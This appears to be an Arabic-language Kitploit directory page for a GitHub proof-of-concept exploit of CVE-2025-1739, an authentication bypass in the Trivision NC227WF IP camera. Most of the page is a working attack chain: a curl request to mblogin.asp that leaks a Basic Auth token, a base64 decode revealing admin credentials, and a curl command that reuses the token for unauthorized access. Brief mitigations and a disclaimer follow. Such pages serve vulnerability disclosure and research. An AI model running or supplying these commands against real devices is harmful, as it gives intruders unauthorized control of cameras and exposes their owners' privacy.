Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1739 — PoC ليوم الصفر لـ CVE-2025-1739 | Kitploit
أدوات/GitHubGitHub/n0n4m3x41/cve-2025-1739
المصادقة والترخيصأمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

PoC ليوم الصفر لـ CVE-2025-1739

عرض المستودع
3منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-1738 و CVE-2025-1739 — إثبات المفهوم لكاميرا Trivision NC227WF

📋 نظرة عامة

CVECVSS v3.1النتيجةCWEالنوع
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288تجاوز المصادقة عبر تسريب بيانات Basic Auth

🔓 CVE-2025-1739 — تسريب كود Basic Auth / تجاوز المصادقة (CWE-288)

الوصف

تسرّب الكاميرا رمز مصادقة Basic صالحًا ومشفّرًا بـ Base64 عبر نقطة النهاية mblogin.asp. يمكن فك ترميز هذا الرمز بسهولة وإعادة استخدامه للوصول غير المصرح به إلى الجهاز — دون الحاجة إلى معرفة كلمة المرور.

  • متجه الهجوم: الشبكة المجاورة (AV:A)
  • درجة CVSS: 7.1
  • CWE: CWE-288 (تجاوز المصادقة باستخدام مسار أو قناة بديلة)

الحمولة

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
صورة

مثال على الاستجابة

يحتوي الرد على رمز مصادقة Basic صالح:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

فك ترميز الرمز

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

إعادة استخدام الرمز

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ التخفيف

  • قم بترقية البرنامج الثابت (firmware) إذا كانت هناك نسخة مصححة متاحة من Trivision.
  • اعزل الكاميرا على شبكة VLAN مخصصة بدون وصول خارجي.
  • احمِ عبر جدار الحماية منفذ إدارة الكاميرا عن قطاعات الشبكة غير الموثوقة.
  • غيّر بيانات الاعتماد الافتراضية وبدّل كلمات المرور بانتظام.
  • راقب أي وصول غير متوقع إلى activex_pal.asp و mblogin.asp.

⚖️ إخلاء مسؤولية

هذا المستودع مخصص للأغراض التعليمية والبحث الأمني المصرح به فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام. احصل دائمًا على إذن صريح قبل اختبار أي جهاز.

تنزيل الأداة